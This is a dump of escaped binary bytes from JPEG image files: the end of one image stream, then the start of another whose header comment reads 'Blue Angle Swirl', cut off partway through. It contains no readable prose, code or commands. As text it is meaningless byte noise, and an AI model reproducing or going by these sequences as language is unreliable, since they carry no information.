o\x8c\xee*v\x02\x0c\x96\xf3|\x8f\xde\xa6\xe5A\x1f\x89\x8b\x91\xf5(\xaeI\x84\xa3\xd3\x9b\xda\xe3`M@\xd7\x0c\x9b\xf0\x7f\xb1\x14\x07\xb5\x94\x11\xa8n\xad\xb1\x15\x07\xd96\xdev\xa5\xc9\x11I\xa9w\x8d\xb9\xf8\xa3\x1fr\xe7\x92?z\xd4\x1a=d\xeb\xb6\x8aP~\xa0+>%.\xe1@\xf8\xa7l[\xf1\x16\x12[\xb6\xe5=\xcbJ[\x9d\x17\x0b\x9d\xb0w\xa9\x8f\x1c\x02\xb2\xe1\xf4\x8e\xd4\x09\xf3\xeac\xb0\xad\x19!\x02S\xdb\xe6\x95\xba\x8f\x9c`\x91\xde\xb7\x8eAw\x18\x18\xfd\xe8\x91\x00\x13#\xbd\x0c\x1d\xb0\xd5*Jo\xc85\xa0\xcd\xbc\x822I\x075\x17\x17LF\x01\xc0\xa5\xdaBx\xda\xa8w\xa9\xe3\xee\x89bI\xc9\xa9\x89\x0b\xb6\x05T\x0c\x9c\x0a~\xda/N t\xeey\xa6WB\xcc\x9e\x8c\x1a\x17\x96\x1b\xfd\xa9g\x8dG\xb9\xce\x05\x1a\xf2\xe1s\xb9\x05\xbc\x0aNGg9cX\xc6_b\xb5\x0c@ROj\x93K\xdc>[H;\x0ekb\xac\xd9b\xedNt\x8bC3\x89\xe6_`\xfaA\xefB\xe9\xd6\xads(g\x18\x8d\x7fz\xd8\x9aH\xad\xa0\xd4\xc4\x05^\x05b\xd0RU\x14\xb3\x90\xaa9&\xb2\xba\x8fSy\xb3\x0d\xa6U8/\xdc\xd2\xbdB\xed\xee[\xdeJ\xc6>\x94\x1d\xea\x90\xc5<\xab\xed]\x0b\xe4\xf3MlB\xacq\xee\xcc3\xe4\x9a\xbaI\x1b&\xa5`@\xa2'O\x8f\x19c\x96\xf9\x19\xa8\xff\x00\xc2\xd6I2\x06O}5x\x003km\x10\xa9v\xf8\xe0S\x16\xd6\x82<M9\xd5!\xdc/\x8ai#\x86\xd1\x02F\xa0\xbe<l*\x8a\x0b>I$\x9aA1\x82\xef\x93\xbd\x1fd\x04\xd4\xa2\x04_\x9a\x0c\xecY\x82/z\x807r\x84\x8d\xa6>p\x83\xc9\xaa\xf4\x941\xdb\xbd\xe3\xee\xf2\xe5c?\xeaik\xd77\x17k\x04[\x84:W\xe4\xf75\xab\x22*\xcd\x1d\xba\xfd\x10.\xf5(\x1b\x82\xaa\xb0\x8ey?z\xa3\x02\xa7\x06\x9d\xe9\x90\x8b\x8b\xb6\x91\xfe\x91N\xc9\x05\x99\x04\x12\x7fJ\xd6\xf5\xc0\xcd\x8a\xed\xc2\xe9\x93\xdc\xbf\xb8\xfbSky\x11@\x19\xf2{\x1a\x8f\xc0\xc2\xccJ\x07#\xe4\x80)\x9b~\x90d\x19Xv\x1d\xc8\xdb\xfb\x9a\xcd\xb8\x85\x9aH\xa5\xdb*~\xc6\x94\xb8\x89\xe3\xf7!8\xady:DAN\xb7\x85\x1b\xc0m\xff\x00aKOaq\x1a\xe5\x1cH\xa3\xb6sY\x99c\xea\xae\x99\x13\x08\xe7\xff\x00\x10ia\xc3\x0a\x0b\x96\x8f\x11\xcb\xeeN\xcc)\xe9\xe1R}\xc3A\xf9\xe0\xd2\xce\xac\xa3K\xaeT\xf6=\xebz@~\x83\x83\x86V\xfd\xeaboL\x84'*~\x93\x5c\xcaP{w^\xea{U6#\xe0\xd4\x0eZ\xca`\xb8Y\x07\x1d\xc7\xc5_\xa8\xc6#\x9fZ}\x0f\xeeSJB\xe4\xfb\x1b\x91\xc7\xcd9\x19\xf5\xec\x8cG\xeb\x8bu\xfbS\xde\xc1\xa7\x94\xc9\x02I\x9eF\xff\x00z]f\xc6\xcdSju\xc0\xf1w\x1e\xe5\xff\x00z\x0bV\xb1\x90\x11\x8co\xf0hD\x11\xb0\xdcWc5\xda\x1b\xb5j]\x0a\xd7T\x95a\xc85\x15v,\x84\x06\xc9\xa2Is#.\x9c\xe0|Pp|T\x81R\x88\xae\xae<\xd7P\x06\xe2L\x0c\x0ejz}\xab\x5cK\xbet\x0eO\x9a\xeb\x1bg\xb9\x9b'\xe9\xeekF\xea\xe2+(t \x05\xb1\xb0\xacZ\x09q46p\x0e2\x07\xb5EdK,\xd7s\xf1\xa8\xf6\x1d\x96\xad\x14S^M\xad\x89\xc1<\xff\x00\xc5m\xd8t\xe8\xe0\x88<\xa9\x81\xd9|\xfd\xeb;\x93\xb1\x9d\xd3\xbak1\xd6\xd8c\xdd\x9b\x81Z1\xdb\xdb\xa0\xf7\x96s\xf1\xb0\xa3\xbeX\x0c\xfbPp\x05%}r#S\x1cg\xdcy\xf8\xab\xbd\x83\xcd%\x94{\x88\x00\xf1\x964\xac\xf7\x8f \xd1\x10\x08\xbe@\xc5+\xee\x90\xeabq\xe4\xd5\xd4\x16\xf6\xa8\xc0\xab1\x10\x06[\x03$\x9e\xe7\xbd5\x0ca\x13'\x9a\xebxp2{U\x98\x83\x96?J\xd2\xd09\x8e\x07\xc9\xdc\xd2\xd2\xbf\xa3g-\xc1\xe4\x8d+\xf7\xab\xdc1\xd3\xf2\xdb\x9a\x0f]\xfe_M\x86/\xea94\xa2\xbf\xc2\xf0\x97\xea:\x88\x07\xd1\x88\xb9\x07\xc9\xa7\xad\xff\x00\xc4\xb8'\x9c\x1a_\xf8U\xd5z\xb3\xc4\xc7\x1e\xb4eW\xe4\xd1\xe4\x06;\x99\xc7\xf9j{\x0e\xf4\xc3\xa3\xa6\x926gb(\xb1\xa0/\x8f\x1b\xb1\xf1C\xb6_N\xd65=\x97?\xa9\xa7\xfa|F1\xaeE\xce\x91\xea0?\x1c\x0f\xef\x8a\x99]M\x91c,v\x80j\x0b\xac\x0eH\xd4T\xf8\x03\x8d\xbc\xd2\xb3_\xca\xecI\x19\xcfwb\x7f\xed@\xea\xac\xff\x00\x8c1\x17\x00\xa0\xf718\x03\xcd.\x90z\x8b\xaa9c\x93\xeck\x13\x19\xddS\x7f\x8a\x9b#\x05\x07\xff\x00\x88\xab\xad\xcc\xf9\xd4J1\xfb\x0a\xceoR3\xef\x0c\xbf=\xaaVV\x189\x07\xedZ\xf1\x88\xd2k\x88\xa5\x04\x5cE\x9c\xf7\xc6\x7fz^n\x9e\x92)ky\x01\x1f\xd0\xc6\x80\xb3\xe7\x92A\xa87\x0d\x13d\xe4|\x8aLl\xe9J\x5c\xdb\xc9\x0c\x85]\x08\xf8\xa5\xa5\x8f\x03Z\x0c\x8e\xe2\xb6\x92\xee\x19\xe3\xf4\xe7\x01\x87\xcf\x22\x97\xbb\xb3\x08\xbe\xa5\xbbkN\xe3\xb8\xab\xbfU\x19\x07\xb1\x1d\xa9\x8biJ\xb0u\xe4sU\xb8\x87H\xd7\x1e\xe3\xb8\xf1AV\xd2u\x0f\xd4U\x81\xf9\xbf\x95p\xb3G\xf4\xb6\xe3\xfe+\xae\x95u\xebLiq\x91\xf1T\xb7q$~\x93\x1ewS\xe0\xd4! \x18\xdb\xf4\xf85gc\x93\x9a\x91\xbf\xc5EA$\x1c\xd6\xf4.7\xd8\xb0\x1fz\xe2\x0e>\xa5\xfe\xf5E\xd6\xdb\xad\x10G&?-,\x15`\xbesU$b\xbaee\xe4\xe7>*\x94\xd7\x03\xab\x8f\x15\xc4\xe2\x81<\x9d\x85\x03\xd77\x11\xdaC\xe9D2\xf8\xc5-on\xf2\xbf\xabpI\xce\xfa|\xd4\xda\xc5\xee\xf5\xa5\xdd\x8f\x00\xf6\xa6\xa1\x0d$\x81@\xe4\xd7=\x87\xbadh\x08:F\xdf\xb55;\xebl\x93\xed\x144U\x86-?\xdc\xd2w\xd7x\xf6\xa9\xdf\xc7\x8a\xce\xb7U\xddB\xef\x03Bs\xfe\x94\x80R}\xcd\xff\x00\xddX)\xfa\x9f\x93\xda\x8b\x14L\xed\xbdnM\x22\xb1\xa1s\x8e\x00\xe2\x9c\xb6\x83|\x01\xbdL\x10\x92\xc1Tnh\xf7\x85m\xe3\x11'\xd6~\xa3\xe2\xa5\xcb\x9d@\x09\x88,\x22\x8f\x7f'\xc9\xaa])\x0e ]\xf0w\xf9\xa6z\x5c%\xb5M\x8f\xa0m\xf7\xa5T\x86\xbd\x1a\xce7\xe4\xd3|\xe8)!\xcbj\xed\xaa\x9d\xbd\xb6\xb6\xea\x16\xe9\x99\x82\xb2\x8cPd\xb6\x9a':\xe38\xf2W \xd0\xc4hN\xfe\x9a\xfe\xa4U\xbc\x8bY\xd8Get\x97S\xdd\x07\xf4\xb7U^I\xa2B\xa6{\x86f\x18\x0er\xc3\xc0\xec*\x88\x90)\xcbJ\xbf\xfe\x00\x93\xfd\xcd;\x00R\x8a#\x18\x0d\xc5@\xdd\x94a\xdf\xd5\x93\x1aW\x80x\xa6\xe4\x94Ej\x92\x9e%\x97P\xf9U\xff\x00\xbeiH\x12[\xbb\x94\xb6\x80\x1d$\x85\xdb\xfdi\x8f\xe2\xcd1N-\xe3\xfa \x88\x22\xd7,\xae\xec\x8a\xc4\xba\x8eK\xbb{\x97\x19-\x8ddy\xde\xb2!\x91\xe2|\xa9#\x15\xe8z<\x82+\xec0\xca\xb0*G\x9a[\xf8\x97\xa4\xb4\x0f\xeb\xc2\x09\x8d\xb7\x15\xbf).\xa8\xad\x9d\xf8u\x0b6\x19|\xe2\x8d-\xaa\xba\xeb\xb7o\xd3\xb5a\xc4\xe5\x1b\xe3\xb8\xa7\xecn\x9e\x22\x19\x0eW\xb8\xabf\xba\x04\x93*\xc5]t\xb0\xf3\xde\xa3Q\xdcr<\x1a\xd4\x83\xf0\xd7\xf1`\x90\x1b\xe7\x8aZ\xfb\xa7M\x01\xca\x82G\x83I\x9c\xea\x9a \xeb\x8d\xd7\xff\x00\xaa\xbd\xbc\xd2Du#d\x0eEP\x92\xa7\x0c\x0a\x91\xe6\xa7\x93\x90w\xae\x9d\xf6\x86\x18\xc5?\xbe0\x12^\xeaxj\xcf\xbc\xb7*\xc5\x90\x11\x8f\xa9|Q\x9bc\x91\xb1\xa2\xac\xa2A\xa6S\x828q\xfe\xf5\x8b\x8e\xba\x19\xd0\xbe\x96\xe7ji\x8e\xb4\xf5\x07\xd4>\xaf\x9a\x15\xec\x05[R\x80>\xdc\x1a\xad\xb4\x9a[\x07qH\x0c\xa7\x22\xa1\xfc\xd4\x91\xa5\xbe\x0f\x15\xcd\xba\xd6\xe5\x17\xb78S\xe6\xaf\xa8\xd0\x228\x7f\x8a5[\xd8\xac\xe7+A4I\x8fj^y\x02\x8c\x0eh)q \xce\x075[XZyB\x8e;\x9a\xach\xd2\xc9\xa4nkBB\x96V\xdaF5\xb5b\xd1E%\x9a\xb4\xec#X\xa3\xd6\xc3sJXC\x9c\xc8\xdc\x0f\xde\x8b<\xc4\xfbWsY\xa2o\xeeNt\xae\xe4\xf6\xa5T\x15l\xb7\xb9\xcf\xedVE\xf7a=\xcey=\x855ml4\xebo\xa7\xbby\xfbU\xe2\x01A\x0b1\xd6\xdf\xaei\xa8c,B \xde\xa5\x14\xbb\x84E\xdb\xb0\xadk\x1bd\xb5@\xf2`\xb9\xacg\x9e\xbbP\x96\x05\xb4\xb5.\xc3\xdcEc\xce\xcc\xd2\x96c\x92MzGAr7\xe1Fk\xcf\xdc\xc4K\x1d\xb1\xbdO\x8a\xee\xee\x95\xa5\xd1b/k\x22&5\x15\xc0\xcdd\xde\xc2\xc8\xe4\x15!\x97b)\x8e\x9fx\xf6\xd2\x85m\x8f}\xf9\xad[\x8bx\xba\x8c>\xa4ED\xc0\x7f\xfbV\xb9\xc6\xecy\xf8.g\x8c\xfbe`>\xf5\xb7\xd3}\x1b\x98?\x98\x8a\xcd\x8eH\xac{\xcbg\x8d\xd8\x15*G \xd1:5\xd8\xb7\xb8\x1a\x8f\xb4\xd6\xb2\x9b\x9b\x80}b?NP\x02\x80\x01\xec)\x9b`\x5c\xa8\x1c\x91\x81Lu\xdbaq\x17\xaf\x0f\xb8s\xfa\xd2\x16S\x10\x06N\x1d\x0d%\xde(\xf6\x7f\xc3\xd6\x0bj\x86r1\x85\xd8\x9e\xf5\xe7?\x89$\x0ds;\x1e\xe7\x15\xa9i\xd6\xa5\x9e\xdf\xd1p\xa3m\xcd`\xf5\x97\x0d#\x1c\xe7&\xb8|x\xe5\xe7\xcbW\xa03\xa6l\x83\xce\xe2\xb7z|\xf1\x5c\xda\xfa\x17\x18(\xfb\x03\xfd&\xb0\x07\xba\x05a\xca\xeci\xae\x970\x12\x98\x9c\xe1\x5cs\xe0\xd7L\xf1\xdcHO\xf8\x93\xa4Ig9e\x5c\xa9\xf1\xc5eD\xe66\xcf#\xb8\xafwjR\xed\x1b\xa7\xdd\xe3X\xfa\x18\xd7\x95\xfe#\xe9rY\x5c\xb7\xb4\xe350\xcf\xfer,\x0e\x09Z<I\x11\xd8\xf2+{\xa3\xf54\x96?Jq\xa9{\x83\xb9\x15\xe5\xad\xa51\xb6\x0f\x06\x9bFh\xdcI\x19\xad\xe5\x8e\xcd\xbd]\xc7E\x8a\xe9=H\x0a\xb2\x9e\x01\xff\x00\x9a\xc9\xbd\xe9\x12@\xf8\xd0\xc9\xf7\xe0\xd1:/XxXa\xb0{\xa9\xe0\xd7\xac\xe9\xb7\x96\xb7\xf1`\xe9\x0d\xc1V\xae7,\xf0^\xde\x16n\x9f6\x9dJ\xa5\xbe\xd4\x9b\xab+a\x81\x07\xe4W\xd2\xa5\xe9\x90\xf2\xa8\x07\xc8\xa4:\xb7G\xb6\x9e\xdf\x12G\x83\xd9\xd4n)\x8f\xf2?'\x8b\xc2\xa4\x83O\xa7 \xca\xf6>){\x98\x8a6G\x07\xc5iu~\x9b-\x9b\x1d\xc4\x91\xf6q\xfe\xfe)\x15#t\x7f\xa4\xfe\xd5\xdf\x8b7\x19R\x17\xd4\xba\x0f=\xaa\xea{\x1a\x0c\xc8b\x93m\xc7b*\xe8\xda\x97#\xf5\xab\x05\x98`\xd1\xa39\x5c\xd0y\x15hN\x1b\x1ek}\x81\xdc>\x9c\x93J\x1dN\xfbnM5\xd4G\xb75\xdd-Tk\x95\x86\xca*Ph\x95,\xed\xf5\xb65\x1aZ0\xd7\x12\x99\xa4\xe3\xb5D\x8c\xd7S\xe4\xe4 \xa3p06\x02\xb2\x1f\x9aP\xa8\x11vQB\x89K\x8c\xb1\xd2\xbd\xfc\x9a\x11\x908\xdc`\xd3\x16\xb8vPx\x03\x8a\x9d@\xcd\xbc)\xa7Q]1\xfe\xedDl\xc8B\xa8\xc0\x1c(\xedVE/\x82O\xc6)\xebD\x86\xd5}i\x86\xe3\xe9Z\xc5\xba\xfe\xd4n\x9bj\xb6\xf1z\xb2\x8fq\xe0R\xd7RK5\xf2\xc6\x999\xe0\x0a\x1d\xdd\xf4\xb3>\xa1\xedQ\xc0\xad?\xe1S\x11\xfe'\x85\xa4\x00\x83\x0e\xa5\x04s\x5c\xf2\x96M\xd1\xaf\xd2z\x15\xd7\xe0\xc4\xc3\x00\xf8n\xf4.\xa1\xd1\x12C\xfc\xdbS\x03\xe3\x1a\xe3\x19S\xf7\x14\xf7R\xebR\x17)\x19\x0a\x01\xc0\x02\xa2\xd7\xae8\xf6\xc8\x01\xfb\xd7\x09~N\xda\xe1\xe3z\xbfJ\x9a\xd9\xb1\x22jC\xf4\xb8\xefI[\xdc\xcdg \xcb\x1d>k\xe9~\x9d\x97P\x8c\xaa\xe9R\xc3u<\x1a\xf3\xbd\x7f\xf8VE\xd4\xf6\xcb\x90\x7f!\xef\xf65\xdf\x0f\x9e^2f\xc6T\x8d\x07R\x83!\x82\xcc\x06\xc7\xcdc^\xda\xbc2\x10W\x04v\xa2K\x0d\xc5\x95\xc1\x000+\xca\xf8\xa7\xa1\xbb\xb7\xbc\x84Es\x85`6o\x15\xdao\x1egHW\xa3\xde\xfaM\xe8\xcd\xbcm\xb6\xf5\x1dZ\xd3\xd0\x90\x5cB5!\xe7\x15[\xab\x09U\xb3\x18\xd6\x0fu5h\xde\xfd\x22\xd1\xb2\xa8?\x9b\x15x\xde\xe0\x5c]\xb0\x18@ry\x14\x19\xcc\xaer\xfb|f\x99\x9d\x8eI\x9ep>\x13\x1b\xd1\xadl\xa5\x91C\xa4\x024<I)\xe7\xec;\xd6\xb7 \xa4\x09\xff\x00\x92s\xfe`?j]\x1fC\xe7\xb05\xa1x\x12\x18\x16\x04<nOr|\xd2\x16\xe0;\xbav5\x9cy\x1a\xf2;Io\x15\xd2\x1f|gKb\xb4fH\xba\xc7M*\xd8\xf5\xd0q\xe6\xbc\xff\x00O\x9d\xe1\x9bA9\xd3\xbf\xdcV\x8d\xf35\xbc\xd1\xdd[\xb1P\xe3;W\x1c\xb1W\x97\xea\x96oip\xc8\xca@\xce\xd5\x16s\x01\xecs\xb1\xe0\xd7\xb3\x96\xca\xd7\xad\xd8\xb1\xc6\x9b\x85\x19\xdb\xbdx\xde\xa7c-\x9c\xe5\x1c\x1c\x03\xcdo\x0c\xe6\x5c^\xcb\x05a\xa4\xeaJ\x7f\xa7\xde\xb2\x91\xb9\x04ps\xb8\xac\xabY\xb3\xecc\xbfbh\xac\x0a\xb6En\xcd\xf1Q\xed:?_\x925\x09>dN3\xdcV\xea\xcf\x05\xd4:\xa1ul\x8e+\xe6\xf6wEN\x1b\xfb\xd6\xad\xa5\xcb)\x0f\x0c\x84\x11\xe0\xd7\x9f?\x8a^\x9a\x94\xef\xf1\x1cF7-\x18?\xe6C\xc1\xaf1u\x1a\x1f|\x5cwS\xf9k\xd7\x8b\xc8\xba\x84^\x85\xd0\x09!\xd8?c\xf7\xaf5\xd6\xec\xe5\xb3\xb99\x1bgc\xe6\xb7\xf1]qJ\xce\xd9\x97Cq\xdb\xe2\x823\x14\x98#j;\xe1\x86G\xea*\x92.\xb5\xf9\x1cWk\x19H#\x90v\xa9\xe0\xe4P\xa2b\x0e\x93D\xab(\x9b\xa5\xf5!\xc8\xed@\xb7r-eQ\xb1\xe6\x98\x8c\xecT\xf0ih\xc6\x99\xa4C\xddM[\xd0%\xb7\xf8#\x14h#2>;\x0eh\x16\xc7\xf9B\x9d\x0e\xb1\xc4\x14c8\xc9\xac\xfa\x1f\xff\xd9\x00\x00.2\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00\xff\xdb\x00C\x00\x04\x02\x03\x03\x03\x02\x04\x03\x03\x03\x04\x04\x04\x04\x05\x09\x06\x05\x05\x05\x05\x0b\x08\x08\x06\x09\x0d\x0b\x0d\x0d\x0d\x0b\x0c\x0c\x0e\x10\x14\x11\x0e\x0f\x13\x0f\x0c\x0c\x12\x18\x12\x13\x15\x16\x17\x17\x17\x0e\x11\x19\x1b\x19\x16\x1a\x14\x16\x17\x16\xff\xdb\x00C\x01\x04\x04\x04\x05\x05\x05\x0a\x06\x06\x0a\x16\x0f\x0c\x0f\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\xff\xfe\x00\x12Blue Angle Swirl\xff\xc0\x00\x11\x08\x01 \x01 \x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x00\x1b\x00\x00\x02\x03\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x07\xff\xc4\x00=\x10\x00\x02\x01\x03\x03\x03\x03\x02\x04\x04\x05\x02\x06\x03\x01\x00\x01\x02\x03\x00\x04\x11\x12!1\x05AQ\x13\x22a2q\x14B\x81\xa1\x06#R\x913b\xb1\xc1\xd1r\xe1\x15$4CS\xf1\x82\x92\xa2\xf0\xff\xc4\x00\x19\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x06\xff\xc4\x00$\x11\x01\x01\x00\x02\x02\x02\x02\x02\x02\x03\x00\x00\x00\x00\x00\x00\x00\x01\x02\x11!1\x12A\x03\x22Qa\x04q\x132B\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00?\x00\xf6:\x14\xae\xdf\xa5tZ\x84\x80g\xf5\xa2E\x83\x10\x149P\x83\xa8W\xdeo|<\xad{\x16\x08\xe1\x98\xe4\x0d\xea\xd7\x0f{y'\xb1N\x91\xc1c\x81JX\xcb\xae.FF\xd4\xcbJt\x80\x18\x81\x8e\xd5\xce\xceD\xc33\xdb\x5c\x8bk\xd8\x90)\xdbV8\xad\x8f\xe1\xebH\xa4\x96\xe0\xb3e\xedp\xf1o\xe7\xbde\xcb\xa2\xfa\xdcC1\xc4\x80{\x1c\xf7\xf8\xaat.\xa1-\x87Y\x81g8\x5c\xfaR\x13\xe0\xd6r\x96\xce\x15\xbaIbNs\x9a\x82\x1b\x1b\x0c\xd7]\x0fJ\xe5\xd4p\x1bj\xbc2\x03\x5c\x94[\x1b\xd7\xb7q\x9c\x80<V\xf5\xbc\xd6\x9dJ\xdc\xc7!]dcq\xcd`\xe1I\xc1\x00\xd0=f\xb7\xba\x0d\x1b\x15\xc5c,<\xba]\x8b\xd7\x7f\x86\xe6yI\x86\x5c\xaf\xf4\xb1'\xfbW\x9c\xbf\xe8\x1dF&\xff\x00\xd2\x93\xbf*2\x0d{\x15\xeb\x8c\xb1a\x86\xb3\xe2\x83q\xd5/%\x1b\x15\xb7O \x02kx|\x9f$\xed5\x1eA:?Z\xcf\xb2\xdel\x0af.\x83q\xf5^^*yT:\x9b\xfe\xd5\xb5-\xd1l\xeb\x9ayI\xe7.@?\xa0\xa5.\xe6\xd3\x11'\x00x\x1b\x0a\xe9\xfeL\xaah\xb46\xd6VyhSS\x0f\xfd\xc9\xb0H\xfb\x0e(77\x99$G\xb9?\x98\xd2\xd7\x13<\x8d\x96;\x0e\x07j\x0e\xa2\xc4\x84\xed\xcb\x1e\x05jc\xbe\xcd\xa6W$\xff\x00S\x1a]\x08\xfcHU\xdc( \x91\xc6k\x9aS!0\xdb\x9f\xfa\xe4?\xedG\xb3\x80*\x0f\x03\xf7\xae\xd8\xe2\x8b^\x82\xcb\xa8r0\xc2\xb4z\x04\xe0\xb9\x8c\xf12\xed\xf7\xa4\x9b\x06E]\xb7\x04\x1a\x1fL\x90\xc6\xec;\xa1\x0c?\xde\xb1\xf2b\xb0\xff\x00O\x96[k\xd6d$4m\xb8\xad^\xbba\x0fW\xe9\xdf\x8b\x81F\xac{\xc0\xec|\xd2\x11(\xff\x00\xc7\xb3\x8fl\x8a\x18V\x9d\xa4\xad\xd3\xaf\xb3\x8c\xc1&\xcc\x0f\x02\xb8g=\xce\xd6<\x05\xf5\xb3\xdb\xceT\x82\x08<\xd5\xed\xa7\x0d\xec\x93\x9e\xc6\xbd\x97\xf1\x8fEI\xa1\xfce\xa8\xd4\x8c3\xb7j\xf0\xf7\x114r\x10F\x08\xae\x98g2\x89a\xc3\x1b!\xd4\x99\xda\x8dmx\xeapM)eu\x8cG!8\x1c\x1e\xe2\x98\x96-^\xe0FO\x04p\xd5\xaf\xed\x1aP\x5c\xa3\xe3|\x1a\xd0p\x9dB\xcf\xd1\x94\x81\x22\x8fk\x1e\xf5\xe6\x15\x9a7\xc3\x0a\xd1\xe9\xf7c 3}\x8dc,=\xac!}o%\xad\xc3G\x22\x91@5\xb9\xd5\xa0\xf5\xe12\xa9/\x8eW9#\xe4V#\x0c\x1f\x22\xba\xe3\x97\x94\xfd\xa0S.\xda\x87\xebS\x0bgcW>(2.\x96\xa7@\xd5YP2\x13\xc3\x0e\x0dB>v<\xd5\xea\xca\x15F\xd2A\xee\x0f\xbb\xe6\x9a\xceTPn#\xdfX\x1fqSl\xd9]>8\xa7\xb0\xca9\x0a(\xd1\xb0u\xc1\xa5\x90\xfbjU\x889\x154\x0b\x1b\xb4\x12\x1cn\x0d2\xf2\xfa\x91jC\xc74\x90\x93\xce\xf51\xbe\x96\xd4\xa7O\xc7\x9a\xa1\xc8.\x08 7\xf7\xa6oB]B\x1f\xff\x00qy\xc7\x7f\x9a\xcf$7\xb9v\xf2(\x96\xf3\x18\xcf\x91R\xcd\xf3\x07\xa4\xb0\xb9\x17v([\xfch\x94$\xbf$pj\xcc\xfa\x06\xdc\xd6oJ`n}T\xc8\x050\xfe\x0f\x8a~\x1c\xcd7\xf9Ep\xb3U\xa3V\x84\xe8,\xdd\xe9y\xcbKq\x85\xa3\xce\xd8Q\x1a\xf3P\xa0B\xbbn\xe7\xf6\xacJ%U \x5c\x9fs\x9e\xd46,\xe7,j\x0e\xe7,rM\x02\xee\xe5b^w\xadH\x09q*B\xb9cY\x17\xb7&F\xcb\x1c\x01\xda\xab4\xf2M6\x95\x05\xd8\xf0\xa2\xa6T\x86\xcd=k\xc6\x0c\xff\x00\x961]1\xc7ICTf\x8c\xc9+zQ\x0e\xe7\x93\xf6\xa5Y\xde\xed\xbd\x1bq\xa2\x15\xfa\x9b\xcf\xc9\xae\x06\xe7\xab\x5c\x12\xcd\xa2\x14\xe4\xf6\x02\x9dQ\x1f\xa6!\x81q\x12\xf7\xc6\xec|\xd7Y5\x7fh\x1d\xbcJ\xab\xa21\xfc\xb1\xdc\xf2\xd4s\x80+\x80\x00`T\x10Y\xc2/&\xba[1\x82\xf0\x8d\x11=\xc1;\xfd)\xf74\xa5\x87\xfe\xa0\xb7\x81LuwX\xd1-\x97\x88\xc6\xff\x00$\xf3\xfbP\xec\x10\x8bv~5\x9d\x22\xb8\xce\xb7F\x829\x8eKw'\xe8\x90\xc5\xfaV\xfd\xdcBH\x06\xaf\x15\xe7/\x09\xf4\xe5E\x180\xb8p<\xed\x8a\xde\xb1\xb9\x17\x1d=]O\x22\xb8\xd6\x97\xe8wK\x04\xa6\xca\xe7\xdd\x0c\x9b\x0c\xf6\xac/\xe3\xbe\x86m\xa47\x10\x8c\xc6\xdb\xe4v\xa7\xa7t\x92M\x07f\x1cV\xb7J\xb9\x8e\xfe\xcd\xba}\xe0\x05\x80\xc0'\xbdc)p\xbeP\xed\xf2\xe9\x10\xe7\xc1\x14k+\xa3\x19\xd0\xfb\xa9\xe4V\xb7\xf1wF\x93\xa7^\x91\x8fcn\xa6\xb0\xd9s\xf7\xafF6e6\xcb`\xc5\x1c\xb0\xeaV\xf5\x13\xcf\xe6O\xbd&\xea\xf0\xc9\xff\x00\xfb\x06\x81eu%\xbc\x81\x94\xef\xdcy\xad{u\x82\xf6,\xa6\xcd\xdd?\xe2\xafB\xbd:\xf7Kibt\x9e\xc6\x96\xea\x90\xfas\x97M\xd1\xf7\x15\xd7v\xb2@\xdb\xe7\x03\x83\xe2\xba9\xf5'\xa5.\xea{\xf8\xa9';\x8aV\xa1\x940\xc1\xa2O\x19\x8d\xbc\x83\xc1\xaaV\xfb@\x1dJ\x9a$M\x91\x83\xcdY\xc6\xa1\x8a\x0b\x02\xad\x8a\xcf@\xf4\x004N\x07c\xc5\x12&\xc8\xdf\x91Q8\xf6\x83\xdc\x1d\xabB\xd1\x1c\xc6\x0f\xc5Z\xad\x14y_\x00Qmm\xa4\x9e]\x11.q\xcbv\x157\xa0\x1cW\x11Z\xb0\xdaZE\x81#\xeb=\xc8\xe0P\xfa\xa5\xad\x9b\xd9\xbc\xd06\x1e=\xf65\x9f.Fz\xb1\x06\x8c\xbe\xecc\xbd.75\xa5\xd3\xe2\xc6$a\x9e\xca<\xd6\xf7\xa9\xb1\xa1d\x86+u\x84\x0f{nkR\x15\x10\xc2\x14}]\xe9{\x08=!\xea>\xee\xdf\xb5\x1ai\x12$.\xec\x00\x15\xe5\xca\xee\xb4\xb6t\xfb\x8e3\xf3\xda\x95\x9a\xed\x03\x15\x07&\xb3z\x8fT\xf5\x9c\xa4\x1cw4\xbc\x0d4\xaf\xe9\xc2\xa5\xdc\xf7\xf1[\xc7\x0f\xcam\xa5qz\xb1\xa7\xb8\xeex\x14\xb2Cs|\xda\xc8\xf4\xe3\x1c\xb3m\x9f\xb51o\xd3\xe1\xb6O\xc4_H\x19\x80\xce\x93\xc0\xac\xee\xb3\xd6\x1a\x5c\xc7o\xedN6\xef[\xc6n\xf0\x0dy\x7fi\xd3\xa21Z\x80\xd2p^\x91\xb2\xb4\xb8\xeaR\x9b\x8b\x97+\x109fo\xf6\xa2t\xae\x94e_\xc6^\x9d\x10\x8d\xc0<\x9ab\xf2\xef\xd6\x22\x18WD+\xc2\x8e\xf5\xbe'\x18\xa2\xd34l\xa2\xde\xd9tB\xbf\xff\x00_&\xae\x83\x02\xa9n\xbe\xc2H\xde\x99\xb4Mr\x80x\x15\xac5&\xc0\xd9J\xe3;f\x8d\xd1\xd45\xc9s\x8c.\xf9<Uo\x94\x89\x08\x1b\xed\xb0\xabt\xdftr\xc4\x83.\xeaB\xfc\xd6~K\xb8\xb1\x99z\xfa\xe6$\xf2w?\xae\xf4\xefO\x02k\x06\x88\x11\xad\x0e\xa0;\x91I\xde\xc4\xc9!l\x1c\x1f\xda\xa9\x04\xcf\x14\x81\x91\x88#\xb8\xa5\x9b\x9c#]\xd9eU\x98\xf3\xa4\xa4\xa3\xc7\x83Q\xd1o\x0d\xab5\x9c\xa7\x83\x95>hv\xb3\xfa\xe7\x5c`,\xc0{\x93\xb3\x8a\xa5\xf4bxC\xc4\x08d\xfaGq\xf1\x5c\xf5\xea\xa8\xf7S\x7f\xe7\x0e\x0e\x0f\x22\x9d\xb7\x94\x9d.\xa7\x12.\xe3\x1d\xeb\x06+\x86yW_\x22\xb6\xd2&\x0a\x1dj\xd9\xc25\xae\x84=s\xa55\xbc\x98\x13(\